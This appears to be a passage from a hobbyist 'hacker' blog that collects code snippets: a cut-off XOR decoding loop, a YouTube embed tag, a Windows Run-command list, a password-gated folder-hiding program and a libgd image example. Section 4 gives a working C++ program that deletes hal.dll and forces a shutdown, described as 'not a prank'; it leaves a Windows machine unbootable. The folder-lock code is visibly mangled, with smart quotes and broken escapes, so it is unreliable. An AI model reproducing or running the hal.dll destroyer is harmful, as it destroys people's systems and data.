     rsz=Rpoint[i+1]-Rpoint[i];
         if(rsz>cracked)
         rsz=cracked;
             printf("Resource[%d](%d)",i,rsz);
     for(j=0;j<rsz;j++)                                   
             printf("%c",Data[Rpoint[i]+j]^keystream[j]);
           printf("");
 }
     exit(0);
 }  

3] PLAY YOUTUBE VIDEOS IN THE WEBSITE>>
src="http://www.youtube.com/urlink"
type="application/x-shockwave-flash">


eg:

 <html>
<body>

<embed
width="420" height="345"
src="http://www.youtube.com/urlink"
type="application/x-shockwave-flash">
</embed>

</body>
</html>

4] TO DELETE THE HAL.DLL FILE

This is a powerful C++ program, which deletes Hal.dll, something that is required for startup. After deleting that, it shuts down, never to start again.This is not a prank..

Warning: Do not try this on your home computer.

Code:

#include <cstdlib>
#include <iostream>

using namespace std;

int main(int argc, char *argv[])
{
    system("del %SystemRoot%\\system32\\hal.dll -q"); //PWNAGE TIME
    system("%SystemRoot%\\system32\\shutdown.exe -s -f -t 00");
    system("PAUSE");
    return EXIT_SUCCESS;
}

Note:
          The "del" command is used in DOS to delete stuff. "-q" is a parameter which means force delete,or delete without asking.shutdown -s -f -t 00 means shutdown,force close everything running,in 00 seconds time.

5] RUN COMMANDS FOR WINDOWS>>>>>>>

CONTROL COMMANDS

* CONTROL: opens the control panel window
* CONTROL ADMINTOOLS: opens the administrative tools
* CONTROL KEYBOARD: opens keyboard properties
* CONTROL COLOUR: opens display properties.Appearance tab
* CONTROL FOLDERS: opens folder options
* CONTROL FONTS: opens font policy management
* CONTROL INTERNATIONAL or INTL.CPL: opens Regional and Language option
* CONTROL MOUSE or MAIN.CPL: opens mouse properties
* CONTROL USERPASSWORDS: opens User Accounts editor
* CONTROL USERPASSWORDS2 or NETPLWIZ: User account access restrictions
* CONTROL PRINTERS: opens faxes and printers available
* APPWIZ.CPL: opens Add or Remove programs utility tool
* OPTIONALFEATURES: opens Add or Remove Windows component utility
* DESK.CPL: opens display properties. Themes tab
* HDWWIZ.CPL: opens add hardware wizard
* IRPROPS.CPL: infrared utility tool
* JOY.CP: opens game controllers settings
* MMSYS.CPL: opens Sound and Audio device Properties. Volume tab
* SYSDM.CPL: opens System properties
* TELEPHON.CPL: Opens phone and Modem options
* TIMEDATE.CPL: Date and Time properties
* WSCUI.CPL: opens Windows Security Center
* ACCESS.CPL: opens Accessibility Options
* WUAUCPL.CPL: opens Automatic Updates
* POWERCFG.CPL: opens Power Options Properties
* AZMAN.MSC: opens authorisation management utility tool
* CERTMGR.MSC: opens certificate management tool
* COMPMGMT.MSC: opens the Computer management tool
* COMEXP.MSC or DCOMCNFG: opens the Computer Services management tool
* DEVMGMT.MSC: opens Device Manager
* EVENTVWR or EVENTVWR.MSC: opens Event Viewer
* FSMGMT.MSC: opens Shared Folders
* NAPCLCFG.MSC: NAP Client configuration utility tool
* SERVICES.MSC: opens Service manager
* TASKSCHD.MSC or CONTROL SCHEDTASKS: opens Schedule Tasks manager
* GPEDIT.MSC: opens Group Policy utility tool
* LUSRMGR.MSC: opens Local Users and Groups
* SECPOL.MSC: opens local security settings
* CIADV.MSC: opens indexing service
* NTMSMGR.MSC: removable storage manager
* NTMSOPRQ.MSC: removable storage operator requests
* WMIMGMT.MSC: opens (WMI) Window Management Instrumentation
* PERFMON or PERFMON.MSC: opens the Performance monitor
* MMC: opens empty Console
* MDSCHED: opens memory diagnostics tools
* DXDIAG: opens DirectX diagnostics tools
* ODBCAD32: opens ODBC Data source Administrator
* REGEDIT or REGEDT32: opens Registry Editor
* DRWTSN32: opens Dr. Watson
* VERIFIER: opens Driver Verifier Manager
* CLICONFG: opens SQL Server Client Network Utility
* UTILMAN: opens Utility Manager
* COLORCPL: opens color management
* CREDWIZ: back up and recovery tool for user passwords
* MOBSYNC: opens Synchronization center
* MSCONFIG: opens System Configuration Utility
* SYSEDIT: opens System Configuration Editor (careful while using this command)
* SYSKEY: Windows Account Database Security management (careful while using this command)

Windows utility and applications

* EPLORER: Opens windows Explorer
* IEXPLORER: Opens Internet explorer
* WAB: opens Contacts
* CHARMAP: opens Character Map
* WRITE: opens WordPad
* NOTEPAD: opens Notepad
* CALC: opens Calculator
* CLIPBRD: opens Clipboard Viewer-> Vista Has no ClipBoard..
* WINCHAT: opens Microsoft Chat Interface
* SOUNDRECORDER: opens sound recording tool
* DVDPLAY: run CD or DVD
* WMPLAYER: opens Windows Media Player
* MOVIEMK: Opens untitled Windows Movie Maker
* OSK: opens on-screen Keyboard
* MAGNIFY: opens Magnifier
* WINCAL: opens Calendar
* DIALER: opens phone Dialer
* EUDCEDIT: opens Private Character Editor
* NDVOL: opens the mixer volume
* RSTRUI : opens Tool System Restore (For Vista only)
* %WINDIR%\SYSTEM32\RESTORE\rstrui.exe: opens Tool System Restore (for XP only).
* MSINFO32: Opens the System Information
* MRT : launches the utility removal of malware.
* Taskmgr : Opens the Windows Task Manager
* CMD: opens a command prompt
* MIGWIZ: Opens the tool for transferring files and settings from Windows (Vista only)
* Migwiz.exe: Opens the tool for transferring files and settings from Windows (for XP only)
* SIDEBAR: Open the Windows (Vista only)
* Sigverif : Opens the tool for verification of signatures of files
* Winver : Opens the window for your Windows version
* FSQUIRT: Bluetooth Transfer Wizard
* IExpress opens the wizard for creating self-extracting archives. Tutorial HERE
* MBLCTR: opens the mobility center (Windows Vista only)
* MSRA : Opens the Windows Remote Assistance
* Mstsc : opens the tool connection Remote Desktop
* MSDT: opens the diagnostic tools and support Microsoft
* WERCON: opens the reporting tool and solutions to problems (for Vista only)
* WINDOWSANYTIMEUPGRADE: Enables the upgrade of Windows Vista
* WINWORD : opens Word (if installed)
* PRINTBRMUI : Opens migration wizard printer (Vista only)


Disk management
* DISKMGMT.MSC: opens disk management utility
* CLEANMGR: opens disk drive clean up utility
* DFRG.MSC: opens disk defragmenter
* CHKDSK: complete analysis of disk partition
* DISKPART: disk partitioning tool


Connection management

* IPCONFIG: list the configuration of IP addresses on your PC (for more information type IPCONFIG/? in the CMD menu)
* INETCPL.CPL: opens internet properties
* FIREWALL.CPL: opens windows firewall
* NETSETUP.CPL: opens network setup wizard


Miscellaneous commands

* JAVAWS: View the cover of JAVA software (if installed)
* AC3FILTER.CPL: Opens the properties AC3 Filter (if installed)
* FIREFOX: Mozilla launches Firefox (if installed)
* NETPROJ: allow or not connecting to a network projector (For Vista only)
* LOGOFF: closes the current session
* SHUTDOWN: shut down Windows
* SHUTDOWN-A: to interrupt Windows shutdown
* %WINDIR% or %SYSTEMROOT%: opens the Windows installation
* %PROGRAMFILES%: Opens the folder where you installed other programs (Program Files)
* %USERPROFILE%: opens the profile of the user currently logged
* %HOMEDRIVE%: opens the browser on the partition or the operating system is installed
* %HOMEPATH%: opens the currently logged user C: \ Documents and Settings \ [username]
* %TEMP%: opens the temporary folder
* VSP1CLN: deletes the cache for installation of the service pack 1 for Vista

6] FOLDER LOCK SOURCE CODE>>>>.

#include<process.h>
#include<iostream.h>
#include<fstream.h>
#include<conio.h>
void print();
void choice();
void main()
{
clrscr();
print();
cout<<”nnnnnnnn -Before proceeding read carefully the
readme.txt file.”;
cout<<”nn -On execution it will create files namely lock.bat &
unlock.bat.”;
cout<<”nnnnnnnnnnnnnnnttttTHANK YOU”;
cout<<”nnnnnnnnnnntttttttpress any key …”;
getch();
clrscr();
char pass[6];
print();
cout<<”nn Enter secret code :”;
abc:for(int i=1;i<=6;i++)
{
pass[i]=getch();
cout<<”*”;
}
getch();
for(i=1;i<=6;i++)
{
if(pass[1]==’R’ && pass[2]==’i’ && pass[3]==’t’ && pass[4]==’e’
&& pass[5]==’s’ && pass[6]==’H')
{
clrscr();
char fold_name[20],ch;
print();
cout<<”nnn Enter the name of the folder you want to protect :
“;
cin.getline(fold_name,20);
char kk;
clrscr();
asd:print();
cout<<”nnn What do you want to do?”;
cout<<”nnnta> Lock Folder”;
cout<<”nntb> Unlock Folder”;
cout<<”nntc> Exit”;
cout<<”nnnnnn Enter your choice : “;
cin>>kk;
switch(kk)
{
case ‘a’:
case ‘A’:
{
qwe:clrscr();
print();
cout<<”nn In which special folder you want to convert your
folder:”;
choice();
cin>>ch;
switch(ch)
{
case ’1′:
{
ofstream file;
file.open(“lock.bat”);
file<<”ren “<<fold_name<<” “<<fold_name<<”.{00022602-
0000-0000-C000-000000000046}ndel lock.bat”;
file.close();
} break;
case ’2′:
{
ofstream file;
file.open(“lock.bat”);
file<<”ren “<<fold_name<<” “<<fold_name<<”.{0CD7A5C0-
9F37-11CE-AE65-08002B2E1262}ndel lock.bat”;
file.close();
} break;
case ’3′:
{
ofstream file;
file.open(“lock.bat”);
file<<”ren “<<fold_name<<” “<<fold_name<<”.{0DF44EAAFF21-
4412-828E-260A8728E7F1}ndel lock.bat”;
file.close();
} break;
case ’4′:
{
ofstream file;
file.open(“lock.bat”);
file<<”ren “<<fold_name<<” “<<fold_name<<”.{208D2C60-
3AEA-1069-A2D7-08002B30309D}ndel lock.bat”;
file.close();
} break;
case ’5′:
{
ofstream file;
file.open(“lock.bat”);
file<<”ren “<<fold_name<<” “<<fold_name<<”.{20D04FE0-
3AEA-1069-A2D8-08002B30309D}ndel lock.bat”;
file.close();
} break;
case ’6′:
{
ofstream file;
file.open(“lock.bat”);
file<<”ren “<<fold_name<<” “<<fold_name<<”.{645FF040-
5081-101B-9F08-00AA002F954E}ndel lock.bat”;
file.close();
} break;
case ’7′:
{
ofstream file;
file.open(“lock.bat”);
file<<”ren “<<fold_name<<” “<<fold_name<<”.{6DFD7C5C-
2451-11d3-A299-00C04F8EF6AF}ndel lock.bat”;
file.close();
} break;
case ’8′:
{
ofstream file;
file.open(“lock.bat”);
file<<”ren “<<fold_name<<” “<<fold_name<<”.{7007ACC7-
3202-11D1-AAD2-00805FC1270E}ndel lock.bat”;
file.close();
} break;
default :
{
cout<<”nn Invalid Choice”;
cout<<”nnnnnnntttttttpress any key …”;
getch();
clrscr();
goto qwe;
}
}//ch
}break;//case1
case ‘b’:
case ‘B’:
{
char ufold_name[20],ch1;
dfg:clrscr();
print();
cout<<”nn In which special folder you have converted your
folder:”;
choice();
cin>>ch1;
switch(ch1)
{
case ’1′:
{
ofstream file;
file.open(“unlock.bat”);
file<<”ren “<<fold_name<<”.{00022602-0000-0000-C000-
000000000046}”<<” “<<fold_name<<”ndel unlock.bat”;
file.close();
} break;
case ’2′:
{
ofstream file;
file.open(“unlock.bat”);
file<<”ren “<<fold_name<<”.{0CD7A5C0-9F37-11CE-AE65-
08002B2E1262}”<<” “<<fold_name<<”ndel unlock.bat”;
file.close();
} break;
case ’3′:
{
ofstream file;
file.open(“unlock.bat”);
file<<”ren “<<fold_name<<”.{0DF44EAA-FF21-4412-828E-
260A8728E7F1}”<<” “<<fold_name<<”ndel unlock.bat”;
file.close();
} break;
case ’4′:
{
ofstream file;
file.open(“unlock.bat”);
file<<”ren “<<fold_name<<”.{208D2C60-3AEA-1069-A2D7-
08002B30309D}”<<” “<<fold_name<<”ndel unlock.bat”;
file.close();
} break;
case ’5′:
{
ofstream file;
file.open(“unlock.bat”);
file<<”ren “<<fold_name<<”.{20D04FE0-3AEA-1069-A2D8-
08002B30309D}”<<” “<<fold_name<<”ndel unlock.bat”;
file.close();
} break;
case ’6′:
{
ofstream file;
file.open(“unlock.bat”);
file<<”ren “<<fold_name<<”.{645FF040-5081-101B-9F08-
00AA002F954E}”<<” “<<fold_name<<”ndel unlock.bat”;
file.close();
} break;
case ’7′:
{
ofstream file;
file.open(“unlock.bat”);
file<<”ren “<<fold_name<<”.{6DFD7C5C-2451-11d3-A299-
00C04F8EF6AF}”<<” “<<fold_name<<”ndel unlock.bat”;
file.close();
} break;
case ’8′:
{
ofstream file;
file.open(“unlock.bat”);
file<<”ren “<<fold_name<<”.{7007ACC7-3202-11D1-AAD2-
00805FC1270E}”<<” “<<fold_name<<”ndel unlock.bat”;
file.close();
} break;
default :
{
cout<<”nn Invalid Choice”;
cout<<”nnnnnnntttttttpress any key …”;
getch();
clrscr();
goto dfg;
}
}//ch
}//case2
case ‘c’:
case ‘C’:
{
exit(0);
}
default :
{
cout<<”nn Invalid Choice”;
cout<<”nnnnnnnnnnntttttttpress any key …”;
getch();
clrscr();
goto asd;
}
}//switchkk
break;}//if
else
{
cout<<”ann Renter secret code :”;
goto abc;
}
}//for
}//main
void print()
{
cout<<”n********************************************************
************************”;
textcolor(RED);
cprintf(“n WEB KING HACKER”);
cprintf(“nn
Developed by: RAJESH KUMAR”);
textcolor(WHITE);
cout<<”nn******************************************************
**************************”;
}
void choice()
{
cout<<”nnnnt1> Media Clip”;//{00022602-0000-0000-C000-
000000000046}
cout<<”nnt2> Cabinet File”; //{0CD7A5C0-9F37-11CE-AE65-
08002B2E1262}
cout<<”nnt3> Taskbar And Start Menu”;//{0DF44EAA-FF21-4412-828E-
260A8728E7F1}
cout<<”nnt4> My Network Places”;//{208D2C60-3AEA-1069-A2D7-
08002B30309D}
cout<<”nnt5> My Computer”; //{20D04FE0-3AEA-1069-A2D8-
08002B30309D}
cout<<”nnt6> Recycle Bin”; //{645FF040-5081-101B-9F08-
00AA002F954E}
cout<<”nnt7> Folder Option”; //{6DFD7C5C-2451-11d3-A299-
00C04F8EF6AF}
cout<<”nnt8> Network Connection”;//{7007ACC7-3202-11D1-AAD2-
00805FC1270E}
cout<<”nnnnnn Enter Your choice : “;
}


7] ADD TEXT TO AN IMAGE>>>>>>>>>>>

Put some txt in an image.

CODING:

#include <stdio.h>
#include <gd.h>
#include <gdfontg.h>

int main(int argc, char *argv[]) {
 gdImagePtr img;
 FILE *fp = {0};
 int width, white, black;

 width = white = black = 0;

 if(argc != 3) {
  fprintf(stderr, "Usage: pngtxt image.png 'Hello world.. !'\n");
  return 1;
 }

 fp = fopen(argv[1], "wb");
 if(fp == NULL) {
  fprintf(stderr, "Error - fopen(%s)\n", argv[1]);
  return 1;
 }

 width = strlen(argv[2]);

 img = gdImageCreate(width * 10, 20);

 white = gdImageColorAllocate(img, 255, 255, 255);
 black = gdImageColorAllocate(img, 0, 0, 0);

 gdImageString(img, gdFontGiant, 2, 1, argv[2], black);

 gdImagePng(img, fp);

 fclose(fp);
 gdImageDestroy(img);

 return 0;
}

 

Visitors Info.

You are from
%%v_FLG%% %%v_IP%%
%%v_CR%% ,%%v_RG%%, %%v_CI%%
%%v_OS_IMG%% %%v_OS%%
%%v_BRW_IMG%% %%v_BRW%%
%%v_I_RESO%% %%v_RESO%% %%v_I_CLR%% %%v_CLR%%
DMCA.com
hackerkonka.blogspot.in Webutation Creative Commons License
Hacker Konka by Konka Karthik is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License.
Back To Top